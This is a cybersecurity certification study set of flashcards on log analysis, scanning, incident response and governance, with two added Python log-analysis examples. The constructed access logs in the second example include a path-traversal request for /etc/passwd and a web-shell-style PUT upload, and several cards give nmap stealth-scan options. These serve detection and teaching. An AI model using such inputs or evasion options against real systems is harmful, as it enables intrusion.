data received by an API must pass server-side validation routines; use proper error handling (sanitize error messages); implement throttling/rate-limiting mechanisms to protect against DoS; secure your APIs using end-to-end encryption (*WARNING: an API must only be used over an encrypted channel, such as HTTPS*)

The Windows ___ command has some advanced functionality for file system analysis

dir

There are principles of _________ and __________ that govern the exchange of evidence between prosecution and defense in a civil or criminal trial (Work Product Retention)

discovery, disclosure

( ) (regex syntax)

defines a matching group with a regex sequence placed within the parentheses, and then each group can subsequently be referred to by \1 for the first group, \2 for the second, and so on

Detection & Analysis (Incident Response Phases)

determine if an incident has taken place, triage it (categorize it and prioritize it), and notify stakeholders

Scope

different keywords that can be used to select the scope of the search, such as site, filetype, related, allintitle, allinurl, or allinanchor

net start

displays all running services on a computer from the command line

w (new accounts)

displays the same basic information as who, but also returns the remote host (if applicable), how long the session has been idle, the process the user is currently running, CPU time consumed, and more (useful for adversary hunting)

rwho (new accounts)

displays the same basic information as who, but runs on a client/server architecture (useful for adversary hunting)

Request for Change (RFC)

document that lists the reason for a change and the procedures to implement that change

Physical Segmentation

each network segment has its own switch, and only devices connected to that switch can communicate with each other

Cloud Access Security Broker (CASB)

enterprise management software designed to mediate access to cloud services by users across all types of devices (essentially, it is the middleman that helps with authentication and ensures people are using only the services they are allowed to use) (provides visibility into how clients and other network nodes use cloud services) (can be set up as either a forward proxy, reverse proxy, or API)

Frequency-based Analysis

establishes a baseline for a metric and monitors the number of occurrences over time

Fileless Malware

executes from memory without saving anything to the filesystem

Tabletop Exercise (TTX)

discussion-based exercise in which participants talk through an incident response scenario against a framework of controls or a red team's attack plan (no live systems are touched)

Write Blockers

forensic tool to prevent the capture or analysis device or workstation from changing data on a target disk or media (hardware write blockers are more reliable than software write blockers)

Response Code 502 (URL Analysis)

indicates a bad gateway: the server, acting as a proxy, received an invalid response from the upstream server

Response Code 504 (URL Analysis)

indicates a gateway timeout: the server, acting as a proxy, did not receive a timely response from the upstream server

Response Code 200 (URL Analysis)

indicates a successful GET or POST request

Response Code 503 (URL Analysis)

indicates an overloading of the server is causing service unavailability

Response Code 404 (URL Analysis)

indicates that a client requested a non-existent resource (very common)

Response Code 400 (URL Analysis)

indicates that a request could not be parsed by the server

Response Code 403 (URL Analysis)

indicates that a request was understood but the client did not have sufficient permissions for the resource (402 is the rarely used "Payment Required" code)

Response Code 401 (URL Analysis)

indicates that a request did not supply authentication credentials

Status Code 450 (SMTP Log Analysis)

indicates that the server can not access the mailbox to deliver the message

Status Code 451 (SMTP Log Analysis)

indicates the local server aborted the action due to a processing error

Status Code 452 (SMTP Log Analysis)

indicates the local server has insufficient storage space available

Status Code 250 (SMTP Log Analysis) *

indicates the message is accepted

Status Code 220 (SMTP Log Analysis) *

indicates the server is ready

Status Code 421 (SMTP Log Analysis)

indicates the service is not available

Response Code 201 (URL Analysis)

indicates that a PUT or POST request has succeeded in creating a resource

Run * (persistence)

runs each of its values asynchronously at every logon (HKLM and HKCU ...\Software\Microsoft\Windows\CurrentVersion\Run); a common malware persistence location

RunOnce * (persistence)

runs its values synchronously, in order, and deletes each value before running its command line, so the entry executes only once (attackers re-create it to persist)

Human-Machine Interface (HMI)

input and output controls on a PLC to allow a user to configure and monitor the system

Server-side code should always utilize _________

input validation

To prevent XML vulnerabilities from being exploited, use proper __________

input validation

To prevent XSS attacks, use proper _________

input validation (together with output encoding of untrusted data)

Interactive Disassembler (IDA)

is a popular cross-platform disassembler and decompiler used by reverse engineers

Yara rule

is a test for matching certain string combinations within a given data source (binary, log file, packet capture, or email)

# (URL Analysis)

is used to indicate a fragment or anchor ID and is not processed by the webserver

nmap --scan-delay <Time> (Sparse Scanning)

issues probes with significant delays to become stealthier and avoid detection by an IDS or IPS

nmap -Tn (Scan Timing)

issues probes using timing template n (T0 "paranoid" is slowest, T5 "insane" is fastest; T3 is the default), trading scan speed against stealth and accuracy

Forensic workstations

must have access to a high-capacity disk array subsystem or storage area network (SAN)

Virtual Segmentation *

network segmentation that relies on VLANs to create equivalent segmentation that would occur if you used physical switches

What is the nmap command to perform an intensive port scan? (intensive fingerprint scan)

nmap -sV <IP address> or nmap -A <IP address> (-sV probes open ports to identify the protocol, application name, and version; -A additionally enables OS detection, default NSE scripts, and traceroute, so it also reports OS type and version, host name, and device type)

User Interaction (UI) (CVSS)

none (N) or required (R)

Privileges Required (PR) (CVSS)

none (N), low (L), or high (H)

Correlation rules depend on ______ data

normalized

OpenVAS

open source vulnerability scanner that began its development from the Nessus codebase when Nessus was converted to commercial software

General Data Protection Regulation (GDPR)

personal data cannot be collected, processed, or retained without a lawful basis such as the individual's informed consent (European law that provides stronger protections than the US)

Attack Vector (AV) (CVSS) (called Access Vector in CVSS v2)

physical (P), local (L), adjacent network (A), or network (N)

physical port security

physical access to the switch ports and switch hardware should be restricted to authorized staff (switches should be locked in a network closet/cabinet)

nmap -sn <IP address>

ping scan to identify which hosts are up and which ones are down (first step)

________ is expressed as a percentage

probability

Risk = (Formula)

probability x magnitude

nmap -PS <PortList> (TCP SYN ping)

probes specific ports from the given list using a TCP SYN packet instead of an ICMP packet to conduct the ping (useful because many networks block ICMP packets)

Enumeration

process to identify and scan network ranges and hosts belonging to the target and map out an attack surface (used by both attackers and defenders)

Normalization

process where data is reformatted or restructured to facilitate the scanning and analysis process

Windows Management Instrumentation Command-Line (WMIC- scripting tools)

command-line interface to Windows Management Instrumentation that can query configuration, processes, and event logs on the local or a remote Windows machine (deprecated in current Windows releases in favor of PowerShell's CIM/WMI cmdlets)

Infrastructure as a Service (IaaS)

provides virtualized compute, storage, and network infrastructure on which the consumer installs and manages the operating system, platforms, and applications (places the responsibility on the consumer for security of the OS, platforms, and applications) (cloud service providers are responsible for the CIA of the hardware in the resource pool) (organizational governance is required to control how VMs and containers are provisioned and deprovisioned)

Software as a Service (SaaS)

provides all the hardware, operating system, software, and applications needed for a complete application service to be delivered to the end user (cloud service providers are responsible for the security of the application, platform, and infrastructure) (consumers remain responsible for their data, account provisioning, and authorizations)

Committee of Sponsoring Organizations of the Treadway Commission (COSO)

provides guidance on a variety of governance-related topics including fraud, controls, finance, and ethics and relies on COSO's ERM-integrated framework (best practice not a law)

Compensating Control

provides the same (or better) level of protection but uses a different methodology or technology

Platform as a Service (PaaS)

provides your organization with the hardware and software needed for a specific service to operate (consider access control, load balancing, failover, privacy, and protection of data) (always encrypt data stored in a third party solution)

Out-of-band Communication

signals that are sent between two parties or two devices that are sent via a path or method different from that of the primary communication between the two parties or devices

Anti-virus (endpoint protection tool)

software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, etc

Data Historian

software that aggregates and catalogs data from multiple sources within an industrial control system (ICS)

Interception Proxy

software that sits between a client and server (MiTM) and allows requests from the client and responses from the server to be analyzed and modified

Decompiler

software that translates a binary or low-level machine language code into higher-level source code (such as Java or C)

Fileless Detection Techniques for Malware

techniques that require analysis of the contents of system memory, and of process behavior, rather than relying on scanning the file system

Website Harvesting

techniques used to copy the source code of website files to analyze for information and vulnerabilities

flags (rule options)

matches on the TCP flags set in the packet (such as SYN, FIN, RST, etc.)

msg (rule options)

text to inform the responder what triggered the rule (basically a comment)

Trusted Execution

the CPU's security extensions invoke a TPM and secure boot attestation to ensure that a trusted operating system is running

Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?

the MITRE ATT&CK Framework

| (regex syntax)

the OR logical operator to match conditions as "this or that"

Port Forwarding

the attacker uses a host as a pivot and is then able to access one of its open TCP/IP ports to send traffic from this port to a port of a host on a different subnet

Enterprise Risk Management (ERM)

the comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization

Crash Dump (System Memory Image Acquisition)

the contents of memory are written to a dump file when Windows encounters an unrecoverable kernel error

Dynamic Analysis

the execution of a compiled program to analyze the way it executes and interacts with a system or network (e.g., debugger, stress test, fuzzing)

head syslog.txt

the first 10 lines of the syslog.txt file are displayed

Phishing

the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers

HTTP Response Codes (URL Analysis)

the header value returned by a server when a client requests a URL (*don't need to memorize codes for exam*)

systemd

the init daemon on most modern Linux distributions; it is the first process executed by the kernel during the boot process and always has process ID (PID) 1

tail syslog.txt

the last 10 lines of the syslog.txt file are displayed

Work Recovery Time (WRT)

the length of time in addition to the RTO of individual systems to perform reintegration and testing of a restored or upgraded system following an event

Recovery Time Objective (RTO)

the length of time it takes AFTER an event to resume normal business operations and activities

Evaluate the following log entry: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on this log entry, which of the following statements is true?

the packet was blocked inbound to the host (IN=eth0 with an empty OUT= shows it arrived on eth0 and was dropped by the INPUT chain; it was a TCP SYN from 10.1.0.102 to port 23/Telnet on 10.1.0.10)

Pre- and Post-admission Control

the point at which client devices are granted or denied access based on their compliance with a health policy

Time of Check to Time of Use (TOCTTOU)

the potential vulnerability that occurs when there is a window between when an app checks a resource and when the app uses it; a change made in that window invalidates the check that was already made (a race condition)

Asset Tagging

the practice of assigning an ID to assets to associate them with entries in an inventory database

Steganography

the practice of concealing data within another file, message, image, or video

Privilege Escalation

the practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application (often follows initial access gained through a phishing campaign)

GET (URL Analysis)

the principal method used with HTTP and is used to retrieve a resource

Data Sovereignty (Data Policies)

the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction

Data Minimization (Data Policies)

the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose

Purpose Limitation (Data Policies)

the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented (will restrict your ability to transfer data to third parties)

Remediation

the process and procedures that occur if a device does not meet the minimum security policy

Mobile Device Management (MDM)

the process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure

System Hardening

the process by which a host or other device is made more secure through the reduction of that device's attack surface area

Data Exfiltration

the process by which an attacker takes data that is stored inside of a private network and moves it to an external network

Reverse Engineering

the process of analyzing the structure of hardware or software to reveal more about how it functions

Security Regression Testing

the process of checking that updates to code do not compromise existing security functionality or capability (enables identification of security mechanisms that worked before but are now broken after the latest changes)

Trend Analysis

the process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or better understand past events

Hardware Source Authenticity

the process of ensuring that hardware is procured tamper-free from trustworthy suppliers

Piping (|)

the process of using the output of one command as the input for a second command

Change Management

the process through which changes to the configuration of information systems are monitored and controlled, as part of the organization's overall configuration management efforts (focuses on configuration information, patches installed, backup records, incident reports/issues)

Chain of Custody

the record of evidence history from collection, to presentation in court, to disposal

$ (regex syntax)

the regex will only match at the end of a line when searching

^ (regex syntax)

the regex will only match at the start of a line when searching (anchor/boundary character)
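
The regex cards for ( ), \1, |, $ and ^ are applied here to the iptables log line from the earlier question, as an added example that is not code from the original study set. The first log line is the one quoted in that question; the other three are constructed to cover the OUTPUT and FORWARD chains and a packet whose source equals its destination:

```python
"""Added example: regex groups, backreferences, alternation and anchors applied
to iptables log lines.

The first line is the one quoted in the card's question; the other three are
constructed for illustration.
"""
import re
from typing import Dict, List, Optional

LOG_LINES = [
    "Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= "
    "MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 "
    "LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 "
    "WINDOW=64240 RES=0x00 SYN URGP=0",
    "Jan 11 05:53:10 lx1 kernel: iptables OUTPUT drop IN= OUT=eth0 "
    "SRC=10.1.0.10 DST=203.0.113.9 LEN=60 PROTO=TCP SPT=44122 DPT=4444 SYN URGP=0",
    "Jan 11 05:53:12 lx1 kernel: iptables FORWARD accept IN=eth0 OUT=eth1 "
    "SRC=10.1.0.102 DST=10.2.0.7 LEN=84 PROTO=ICMP TYPE=8",
    "Jan 11 05:53:20 lx1 kernel: iptables INPUT drop IN=eth0 OUT= "
    "SRC=10.1.0.10 DST=10.1.0.10 LEN=40 PROTO=TCP SPT=23 DPT=23 SYN URGP=0",
]

# ^ anchors the match at the start of the line. Groups 1-4 capture timestamp,
# host, chain and action; (INPUT|OUTPUT|FORWARD) is alternation.
HEADER_RE = re.compile(
    r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) kernel: iptables "
    r"(INPUT|OUTPUT|FORWARD) (\w+) "
)
# KEY=VALUE pairs; \S* rather than \S+ so an empty value such as OUT= still matches.
FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")
# \1 refers back to group 1, so this matches only when DST repeats SRC exactly;
# the trailing \b stops 10.1.0.10 from matching as a prefix of 10.1.0.102.
LAND_RE = re.compile(r"SRC=(\d{1,3}(?:\.\d{1,3}){3}) DST=\1\b")
# $ anchors at the end of the line: a bare SYN is the last flag before URGP=.
BARE_SYN_RE = re.compile(r" SYN URGP=\d+$")


def parse_line(line: str) -> Optional[Dict[str, object]]:
    m = HEADER_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = {"time": m.group(1), "host": m.group(2),
                              "chain": m.group(3), "action": m.group(4)}
    rec.update(dict(FIELD_RE.findall(line, m.end())))   # fields after the header
    return rec


def direction(rec: Dict[str, object]) -> str:
    """IN set and OUT empty is inbound to the host; both set means forwarded."""
    inbound, outbound = bool(rec.get("IN")), bool(rec.get("OUT"))
    if inbound and outbound:
        return "forwarded"
    if inbound:
        return "inbound"
    if outbound:
        return "outbound"
    return "unknown"


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    results = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rec["direction"] = direction(rec)
        rec["same_src_dst"] = LAND_RE.search(line) is not None
        rec["bare_syn"] = BARE_SYN_RE.search(line) is not None
        results.append(rec)
    return results


if __name__ == "__main__":
    for r in analyze(LOG_LINES):
        print(r["chain"], r["action"], r["direction"], r.get("SRC"), "->",
              r.get("DST"), "dpt", r.get("DPT"), "SRC==DST" if r["same_src_dst"] else "")
```

Anchoring with `^` keeps the header pattern from matching a string that merely contains "kernel: iptables" somewhere in the middle, and the backreference in LAND_RE is the kind of check a rule engine cannot express with plain substring matching.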

Artificial Intelligence (AI)

the science of creating machines with the ability to develop problem solving and analysis strategies without significant human direction or intervention

krbtgt hash

the password hash of the krbtgt account, which is the key used to encrypt and sign every ticket-granting ticket (TGT) the KDC issues; it is the trust anchor of the Active Directory domain and functions like the private key of a root certificate authority (an attacker who obtains it can forge TGTs for any user, the Golden Ticket attack)

Credentialed Scan (Vulnerability Scanner Types)

the vulnerability scanner is given user accounts to log-on to the target systems or hosts (likely to find vulnerabilities and misconfigurations)

Non-credentialed Scan (Vulnerability Scanner Types)

the vulnerability scanner sends test packets against a target without logging onto the system or host (are more appropriate for external assessment of the network perimeter)

Cellebrite (Mobile Device Forensics)

tool focused on evidence extraction from smartphone and other mobile devices, including older feature phones, and from cloud data and metadata using a universal forensic extraction device (UFED)

crontab (crontab -l)

tool that manages cron jobs, the Linux equivalent of scheduled tasks (on Windows)

Service Analysis Tools for Windows

tools that can help identify suspicious service activity even when anti-malware scanners fail to identify it

Dark Nets

unused physical network ports or unused IP address space within a local network; no legitimate traffic should be sent there, so attacker port scans and malware probes that reach it stand out, and the space can be monitored as a trap

What is an effective way to synchronize time for our logs in a SIEM?

use Coordinated Universal Time (UTC) (time standard not a time zone)

How do you mitigate against different kinds of Covert Channels?

advanced intrusion detection and user behavior analytics tools are the best option for detecting covert channels, but they will not detect everything

Traceroute (hping)

use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces when ICMP is blocked on a given network

How do you mitigate rouge devices on your network?

use digital certificates on endpoints and servers to authenticate and encrypt traffic using IPsec or HTTPS, so a rogue device without a valid certificate cannot participate

Quotes (" ")

use double quotes to specify an exact phrase and make a search more precise

Social Media Websites (Beaconing)

using the messaging functions of social media platforms allows an attacker to live off the land (attackers don't have to create their own tools; instead they send their messages through the social media APIs, and it's harder to detect because the traffic blends in with legitimate use)

What is the best mitigation strategy for data exfiltration?

use strong encryption of data at rest and data in transit

NOT operator

use the minus sign in front of a word or quoted phrase to exclude results that contain that string

AND/OR operator

use these logical operators to require both search items (AND) or to require either search item (OR)

Discovery Scan

used to create and update an inventory of assets by conducting enumeration of the network and its targets without scanning for vulnerabilities (similar to nmap scan) (ping sweep of network)

Timestamping (hping)

used to determine the system's uptime

DELETE (URL Analysis)

used to remove the requested resource

POST (URL Analysis)

used to send data to the server for processing by the requested resource

Framework Profiles

used to supply statements of current cybersecurity outcomes (current profile) and target cybersecurity outcomes (target profile); comparing the two identifies the gaps in capability and the investments that will be most productive in closing them (essentially, capture a baseline of where your organization stands against the framework right now and where you want it to be)

a _______ rootkit might have administrator-level privileges but uses OS features for persistence

user mode

Memorandum of Understanding (MOU)

usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money

Query parameters (URL Analysis)

usually formatted as one or more name=value pairs with '&' delimiting each pair
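
A pass over web server log lines that pulls apart the request URL (method, path, query parameters) and the response code, added here as an example that is not code from the original study set. The access log lines are constructed in Common Log Format, and the threshold of five 401 responses from one client is an assumed tuning value:

```python
"""Added example: URL and HTTP status analysis over constructed access log lines.

Lines are constructed in Common Log Format; the five-401 threshold is assumed.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

ACCESS_LOG = [
    '10.0.0.5 - - [11/Jan/2024:05:52:56 +0000] "GET /index.html HTTP/1.1" 200 5123',
    '10.0.0.5 - - [11/Jan/2024:05:53:00 +0000] "GET /search?q=cysa&page=2 HTTP/1.1" 200 2210',
    '198.51.100.7 - - [11/Jan/2024:05:53:01 +0000] "POST /login HTTP/1.1" 401 312',
    '198.51.100.7 - - [11/Jan/2024:05:53:02 +0000] "POST /login HTTP/1.1" 401 312',
    '198.51.100.7 - - [11/Jan/2024:05:53:03 +0000] "POST /login HTTP/1.1" 401 312',
    '198.51.100.7 - - [11/Jan/2024:05:53:04 +0000] "POST /login HTTP/1.1" 401 312',
    '198.51.100.7 - - [11/Jan/2024:05:53:05 +0000] "POST /login HTTP/1.1" 401 312',
    '198.51.100.7 - - [11/Jan/2024:05:53:09 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    '203.0.113.4 - - [11/Jan/2024:05:53:30 +0000] "PUT /uploads/cmd.php HTTP/1.1" 201 0',
    '10.0.0.9 - - [11/Jan/2024:05:54:00 +0000] "GET /api/report HTTP/1.1" 502 0',
]

# client ident user [timestamp] "METHOD target protocol" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]+" (\d{3}) (\d+|-)$')


def parse_access_line(line: str) -> Optional[Dict[str, object]]:
    m = LINE_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status, _size = m.groups()
    parts = urlsplit(target)   # path, query and fragment (a fragment never reaches the server)
    # parse_qs splits name=value pairs on '&' and percent-decodes the values
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"client": client, "time": ts, "method": method,
            "path": parts.path, "params": params, "status": int(status)}


def analyze(lines: List[str], auth_fail_threshold: int = 5
            ) -> Tuple[List[Dict[str, object]], List[Tuple[str, str, str]]]:
    recs = [r for r in map(parse_access_line, lines) if r]
    findings: List[Tuple[str, str, str]] = []
    fails = Counter(str(r["client"]) for r in recs if r["status"] == 401)
    for client, n in fails.items():
        if n >= auth_fail_threshold:
            findings.append(("credential-guessing", client, f"{n} x 401"))
    for r in recs:
        client = str(r["client"])
        for key, values in r["params"].items():    # type: ignore[union-attr]
            for v in values:
                if "../" in v or "..\\" in v:
                    findings.append(("path-traversal", client, f"{key}={v}"))
        if r["method"] in {"PUT", "DELETE"}:
            findings.append(("resource-modifying-method", client,
                             f'{r["method"]} {r["path"]} -> {r["status"]}'))
        if 500 <= int(r["status"]) <= 599:   # type: ignore[call-overload]
            findings.append(("server-error", client, f'{r["path"]} -> {r["status"]}'))
    return recs, findings


def status_summary(recs: List[Dict[str, object]]) -> Counter:
    return Counter(int(r["status"]) for r in recs)   # type: ignore[call-overload]


if __name__ == "__main__":
    records, found = analyze(ACCESS_LOG)
    print(status_summary(records))
    for kind, client, detail in found:
        print(f"{kind:26s} {client:14s} {detail}")
```

The traversal attempt is decoded only once by parse_qs; an attacker may double-encode (`%252F`) to slip past a single decode, so production detection normalizes repeatedly until the value stops changing. The PUT that returned 201 is the finding to act on first: it means the server actually created the uploaded file.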

Covert Timing Channel

utilizes one process to alter a system resource so that changes in its response time can signal information to a recipient process

Covert Storage Channel

utilizes one process to write to a storage location and another process to read from that location (by splitting up these processes this type of covert channel cannot be detected by the operating system kernel)

Nikto

vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications

grep "NetworkManager" /var/log/syslog | cut -d " " -f1-5 | sort -t " " -k3

search /var/log/syslog for lines containing "NetworkManager" (every matching line is piped to the next command); cut keeps only the first five space-delimited fields of each line (the timestamp, host, and process); sort then orders the result on the third space-delimited field (the time)

How do you mitigate against application-based attacks?

web application firewall (WAF)

Vulnerability scans should be performed at least ________

weekly

When does an injection attack occur?

when the attacker inserts malicious code through an application interface

You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BEGIN OUTPUT ———————--------- # nmap win2k16.local Nmap scan report for win2k16 (192.168.2.15) Host is up (0.132452s latency) Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # nc win2k16.local 80 220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1) # nc win2k16.local 22 SSH-2.0-OpenSSH_7.2 Debian-2 # ———————--------- END OUTPUT

your email is running on a non-standard port

